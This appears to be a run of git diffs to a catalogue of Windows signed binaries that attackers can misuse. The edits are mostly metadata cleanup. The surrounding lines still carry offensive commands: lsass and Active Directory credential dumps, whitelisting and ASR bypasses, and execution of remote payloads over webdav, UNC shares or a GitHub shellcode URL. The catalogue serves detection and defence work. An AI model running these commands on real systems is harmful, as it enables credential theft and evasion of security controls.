 Full_Path:
   - Path: C:\Windows\System32\winrm.vbs

--- a/yml/OSScripts/pester.yml
+++ b/yml/OSScripts/pester.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1216
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
     OperatingSystem: Windows 10
 Full_Path:
   - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat

--- a/yml/OtherMSBinaries/Adplus.yml
+++ b/yml/OtherMSBinaries/Adplus.yml
@@ -2,7 +2,7 @@
 Name: adplus.exe
 Description: Debugging tool included with Windows Debugging Tools
 Author: mr.d0x
-Created: 1/9/2021
+Created: 2021-09-01
 Commands:
   - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
     Description: Creates a memory dump of the lsass process

--- a/yml/OtherMSBinaries/Adplus.yml
+++ b/yml/OtherMSBinaries/Adplus.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Create memory dump and parse it offline
     Category: Dump
     Privileges: SYSTEM
-    MitreID: T1003
+    MitreID: T1003.001
     OperatingSystem: All Windows
 Full_Path:
   - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe

--- a/yml/OtherMSBinaries/Adplus.yml
+++ b/yml/OtherMSBinaries/Adplus.yml
@@ -10,15 +10,14 @@ Commands:
     Category: Dump
     Privileges: SYSTEM
     MitreID: T1003
-    MitreLink: https://attack.mitre.org/techniques/T1003/
     OperatingSystem: All Windows
 Full_Path:
   - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
   - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
-Code_Sample: 
-  - Code: 
-Detection: 
-  - IOC: 
+Code_Sample:
+  - Code:
+Detection:
+  - IOC:
 Resources:
   - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
 Acknowledgement:

--- a/yml/OtherMSBinaries/Agentexecutor.yml
+++ b/yml/OtherMSBinaries/Agentexecutor.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10
   - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
     Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Program Files (x86)\Microsoft Intune Management Extension

--- a/yml/OtherMSBinaries/Appvlp.yml
+++ b/yml/OtherMSBinaries/Appvlp.yml
@@ -1,7 +1,7 @@
 ---
 Name: Appvlp.exe
 Description: Application Virtualization Utility Included with Microsoft Office 2016
-Author: ''
+Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
   - Command: AppVLP.exe \\webdav\calc.bat
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 w/Office 2016
   - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
     Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 w/Office 2016
   - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
     Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
@@ -26,7 +24,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 w/Office 2016
 Full_Path:
   - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe

--- a/yml/OtherMSBinaries/Bginfo.yml
+++ b/yml/OtherMSBinaries/Bginfo.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
   - Command: bginfo.exe bginfo.bgi /popup /nolicprompt
     Description: Execute VBscript code that is referenced within the bginfo.bgi file.
@@ -18,7 +17,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
   - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
     Usecase: Remote execution of VBScript
@@ -26,7 +24,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
   - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
     Usecase: Remote execution of VBScript
@@ -34,7 +31,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
   - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
     Usecase: Remote execution of VBScript
@@ -42,7 +38,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
   - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
     Usecase: Remote execution of VBScript
@@ -50,7 +45,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full_Path:
   - Path: No fixed path

--- a/yml/OtherMSBinaries/Cdb.yml
+++ b/yml/OtherMSBinaries/Cdb.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
   - Command: |
      cdb.exe -pd -pn <process_name>
@@ -19,8 +18,7 @@ Commands:
     Usecase: Run a shell command under a trusted Microsoft signed binary
     Category: Execute
     Privileges: User
-    MitreID: 
-    MitreLink:
+    MitreID: T1218
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
@@ -34,7 +32,7 @@ Resources:
   - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
   - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
   - Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
-Acknoledgement:
+Acknowledgement:
   - Person: Matt Graeber
     Handle: '@mattifestation'
   - Person: mr.d0x

--- a/yml/OtherMSBinaries/Cdb.yml
+++ b/yml/OtherMSBinaries/Cdb.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Local execution of assembly shellcode.
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows
   - Command: |
      cdb.exe -pd -pn <process_name>
@@ -18,7 +18,7 @@ Commands:
     Usecase: Run a shell command under a trusted Microsoft signed binary
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe

--- a/yml/OtherMSBinaries/Coregen.yml
+++ b/yml/OtherMSBinaries/Coregen.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1055
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1055
     OperatingSystem: Windows
   - Command: coregen.exe dummy_assembly_name
     Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1055
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1055
     OperatingSystem: Windows
   - Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
     Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.
@@ -26,13 +24,12 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
   - Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
-Code_Sample: 
-  - Code: 
+Code_Sample:
+  - Code:
 Detection:
   - IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\"
   - IOC: coregen.exe loading .dll file not named coreclr.dll
@@ -44,9 +41,9 @@ Resources:
   - Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
 Acknowledgement:
   - Person: Nicky Tyrer
-    Handle: 
+    Handle:
   - Person: Evan Pena
-    Handle: 
+    Handle:
   - Person: Casey Erikson
-    Handle: 
+    Handle:
 ---

--- a/yml/OtherMSBinaries/Csi.yml
+++ b/yml/OtherMSBinaries/Csi.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Local execution of unsigned C# code.
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe

--- a/yml/OtherMSBinaries/Csi.yml
+++ b/yml/OtherMSBinaries/Csi.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe

--- a/yml/OtherMSBinaries/DefaultPack.yml
+++ b/yml/OtherMSBinaries/DefaultPack.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Program Files (x86)\Microsoft\DefaultPack\

--- a/yml/OtherMSBinaries/Devtoolslauncher.yml
+++ b/yml/OtherMSBinaries/Devtoolslauncher.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with VS/VScode installed
   - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
     Description: The above binary will execute other binary.
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with VS/VScode installed
 Full_Path:
   - Path: 'c:\windows\system32\devtoolslauncher.exe'

--- a/yml/OtherMSBinaries/Devtoolslauncher.yml
+++ b/yml/OtherMSBinaries/Devtoolslauncher.yml
@@ -9,14 +9,14 @@ Commands:
     Usecase: Execute any binary with given arguments and it will call developertoolssvc.exe. developertoolssvc is actually executing the binary. https://i.imgur.com/Go7rc0I.png
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows 7 and up with VS/VScode installed
   - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
     Description: The above binary will execute other binary.
     Usecase: Execute any binary with given arguments.
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows 7 and up with VS/VScode installed
 Full_Path:
   - Path: 'c:\windows\system32\devtoolslauncher.exe'

--- a/yml/OtherMSBinaries/Dnx.yml
+++ b/yml/OtherMSBinaries/Dnx.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Local execution of C# project stored in consoleapp folder.
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows
 Full_Path:
   - Path: N/A

--- a/yml/OtherMSBinaries/Dnx.yml
+++ b/yml/OtherMSBinaries/Dnx.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full_Path:
   - Path: N/A

--- a/yml/OtherMSBinaries/Dotnet.yml
+++ b/yml/OtherMSBinaries/Dotnet.yml
@@ -9,7 +9,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 7 and up with .NET installed
   - Command: dotnet.exe [PATH_TO_DLL]
     Description: dotnet.exe will execute any DLL.
@@ -17,14 +16,12 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 7 and up with .NET installed
   - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
     Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 with .NET Core installed
 Full_Path:
   - Path: 'C:\Program Files\dotnet\dotnet.exe'

--- a/yml/OtherMSBinaries/Dxcap.yml
+++ b/yml/OtherMSBinaries/Dxcap.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Windows\System32\dxcap.exe

--- a/yml/OtherMSBinaries/Dxcap.yml
+++ b/yml/OtherMSBinaries/Dxcap.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Local execution of a process as a subprocess of Dxcap.exe
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Windows\System32\dxcap.exe

--- a/yml/OtherMSBinaries/Excel.yml
+++ b/yml/OtherMSBinaries/Excel.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe

--- a/yml/OtherMSBinaries/Fsi.yml
+++ b/yml/OtherMSBinaries/Fsi.yml
@@ -10,28 +10,26 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1059
-    MitreLink: https://attack.mitre.org/techniques/T1059/
     OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
   - Command: fsi.exe
-    Description: Execute F# code via interactive command line 
+    Description: Execute F# code via interactive command line
     Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
     Category: AWL Bypass
     Privileges: User
     MitreID: T1059
-    MitreLink: https://attack.mitre.org/techniques/T1059/
     OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
 Full_Path:
   - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe
   - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
-Code_Sample: 
+Code_Sample:
   - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
-Detection: 
+Detection:
   - IOC: Sysmon Event ID 1 - Process Creation
 Resources:
   - Link: https://twitter.com/NickTyrer/status/904273264385589248
   - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
 Acknowledgement:
-  - Person: Nick Tyrer 
+  - Person: Nick Tyrer
     Handle: '@NickTyrer'
   - Person: Jimmy
     Handle: '@bohops'

--- a/yml/OtherMSBinaries/FsiAnyCpu.yml
+++ b/yml/OtherMSBinaries/FsiAnyCpu.yml
@@ -10,26 +10,24 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1059
-    MitreLink: https://attack.mitre.org/techniques/T1059/
     OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
   - Command: fsianycpu.exe
-    Description: Execute F# code via interactive command line 
+    Description: Execute F# code via interactive command line
     Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
     Category: AWL Bypass
     Privileges: User
     MitreID: T1059
-    MitreLink: https://attack.mitre.org/techniques/T1059/
     OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
 Full_Path:
   - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
-Code_Sample: 
+Code_Sample:
   - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
-Detection: 
+Detection:
   - IOC: Sysmon Event ID 1 - Process Creation
 Resources:
   - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
 Acknowledgement:
-  - Person: Nick Tyrer 
+  - Person: Nick Tyrer
     Handle: '@NickTyrer'
   - Person: Jimmy
     Handle: '@bohops'

--- a/yml/OtherMSBinaries/Mftrace.yml
+++ b/yml/OtherMSBinaries/Mftrace.yml
@@ -9,14 +9,14 @@ Commands:
     Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe.
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows
   - Command: Mftrace.exe powershell.exe
     Description: Launch cmd.exe as a subprocess of Mftrace.exe.
     Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe.
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86

--- a/yml/OtherMSBinaries/Mftrace.yml
+++ b/yml/OtherMSBinaries/Mftrace.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
   - Command: Mftrace.exe powershell.exe
     Description: Launch cmd.exe as a subprocess of Mftrace.exe.
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86

--- a/yml/OtherMSBinaries/Msdeploy.yml
+++ b/yml/OtherMSBinaries/Msdeploy.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows server
   - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
     Description: Launch calc.bat via msdeploy.exe.
@@ -18,7 +17,6 @@ Commands:
     Category: AWL bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows server
 Full_Path:
   - Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe

--- a/yml/OtherMSBinaries/Msxsl.yml
+++ b/yml/OtherMSBinaries/Msxsl.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
   - Command: msxsl.exe customers.xml script.xsl
     Description: Run COM Scriptlet code within the script.xsl file (local).
@@ -18,7 +17,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
   - Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
     Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
@@ -26,7 +24,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
   - Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
     Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
@@ -34,7 +31,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full_Path:
   - Path:

--- a/yml/OtherMSBinaries/Ntdsutil.yml
+++ b/yml/OtherMSBinaries/Ntdsutil.yml
@@ -1,6 +1,6 @@
 ---
 Name: ntdsutil.exe
-Description: Command line utility used to export Actove Directory.
+Description: Command line utility used to export Active Directory.
 Author: 'Tony Lambert'
 Created: 2020-01-10
 Commands:

--- a/yml/OtherMSBinaries/Ntdsutil.yml
+++ b/yml/OtherMSBinaries/Ntdsutil.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Dumping of Active Directory NTDS.dit database
     Category: Dump
     Privileges: Administrator
-    MitreID: T1003
+    MitreID: T1003.003
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Windows\System32\ntdsutil.exe

--- a/yml/OtherMSBinaries/Ntdsutil.yml
+++ b/yml/OtherMSBinaries/Ntdsutil.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Dump
     Privileges: Administrator
     MitreID: T1003
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Windows\System32\ntdsutil.exe

--- a/yml/OtherMSBinaries/Powerpnt.yml
+++ b/yml/OtherMSBinaries/Powerpnt.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe

--- a/yml/OtherMSBinaries/Procdump.yml
+++ b/yml/OtherMSBinaries/Procdump.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1202
-    MitreLink: https://attack.mitre.org/techniques/T1202
     OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
   - Command: procdump.exe -md calc.dll foobar
     Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
@@ -18,12 +17,14 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1202
-    MitreLink: https://attack.mitre.org/techniques/T1202
     OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
-Detection: 
+Detection:
   - IOC: Process creation with given '-md' parameter
   - IOC: Anomalous child processes of procdump
   - IOC: Unsigned DLL load via procdump.exe or procdump64.exe
 Resources:
   - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20
+Acknowledgement:
+  - Name: Alfie Champion
+    Handle: '@ajpc500'
 ---

--- a/yml/OtherMSBinaries/Rcsi.yml
+++ b/yml/OtherMSBinaries/Rcsi.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
   - Command: rcsi.exe bypass.csx
     Description: Use embedded C# within the csx script to execute the code.
@@ -18,7 +17,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full_Path:
   - Path:

--- a/yml/OtherMSBinaries/Rcsi.yml
+++ b/yml/OtherMSBinaries/Rcsi.yml
@@ -9,14 +9,14 @@ Commands:
     Usecase: Local execution of arbitrary C# code stored in local CSX file.
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows
   - Command: rcsi.exe bypass.csx
     Description: Use embedded C# within the csx script to execute the code.
     Usecase: Local execution of arbitrary C# code stored in local CSX file.
     Category: AWL Bypass
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows
 Full_Path:
   - Path:

--- a/yml/OtherMSBinaries/Remote.yml
+++ b/yml/OtherMSBinaries/Remote.yml
@@ -2,38 +2,35 @@
 Name: Remote.exe
 Description: Debugging tool included with Windows Debugging Tools
 Author: mr.d0x
-Created: 1/6/2021
+Created: 2021-06-01
 Commands:
   - Command: Remote.exe /s "powershell.exe" anythinghere
     Description: Spawns powershell as a child process of remote.exe
-    Usecase: Executes a process under a trusted Microsoft signed binary 
+    Usecase: Executes a process under a trusted Microsoft signed binary
     Category: AWL Bypass
     Privileges: User
-    MitreID:
-    MitreLink: 
+    MitreID: T1218
     OperatingSystem:
   - Command: Remote.exe /s "powershell.exe" anythinghere
     Description: Spawns powershell as a child process of remote.exe
     Usecase: Executes a process under a trusted Microsoft signed binary
     Category: Execute
     Privileges: User
-    MitreID:
-    MitreLink: 
+    MitreID: T1218
     OperatingSystem:
   - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
     Description: Run a remote file
     Usecase: Executing a remote binary without saving file to disk
     Category: Execute
     Privileges: User
-    MitreID: 
-    MitreLink: 
+    MitreID: T1218
     OperatingSystem:
 Full_Path:
   - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
   - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
-Code_Sample: 
-  - Code: 
-Detection: 
+Code_Sample:
+  - Code:
+Detection:
   - IOC: remote.exe spawned
 Resources:
   - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/

--- a/yml/OtherMSBinaries/Remote.yml
+++ b/yml/OtherMSBinaries/Remote.yml
@@ -9,21 +9,21 @@ Commands:
     Usecase: Executes a process under a trusted Microsoft signed binary
     Category: AWL Bypass
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem:
   - Command: Remote.exe /s "powershell.exe" anythinghere
     Description: Spawns powershell as a child process of remote.exe
     Usecase: Executes a process under a trusted Microsoft signed binary
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem:
   - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
     Description: Run a remote file
     Usecase: Executing a remote binary without saving file to disk
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem:
 Full_Path:
   - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe

--- a/yml/OtherMSBinaries/Sqldumper.yml
+++ b/yml/OtherMSBinaries/Sqldumper.yml
@@ -16,7 +16,7 @@ Commands:
     Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID.
     Category: Dump
     Privileges: Administrator
-    MitreID: T1003
+    MitreID: T1003.001
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe

--- a/yml/OtherMSBinaries/Sqldumper.yml
+++ b/yml/OtherMSBinaries/Sqldumper.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Dump
     Privileges: Administrator
     MitreID: T1003
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
     OperatingSystem: Windows
   - Command: sqldumper.exe 540 0 0x01100:40
     Description: 0x01100:40 flag will create a Mimikatz compatible dump file.
@@ -18,7 +17,6 @@ Commands:
     Category: Dump
     Privileges: Administrator
     MitreID: T1003
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe

--- a/yml/OtherMSBinaries/Sqlps.yml
+++ b/yml/OtherMSBinaries/Sqlps.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe

--- a/yml/OtherMSBinaries/Sqltoolsps.yml
+++ b/yml/OtherMSBinaries/Sqltoolsps.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full_Path:
   - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe

--- a/yml/OtherMSBinaries/Squirrel.yml
+++ b/yml/OtherMSBinaries/Squirrel.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Microsoft Teams installed
   - Command: squirrel.exe --update [url to package]
     Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
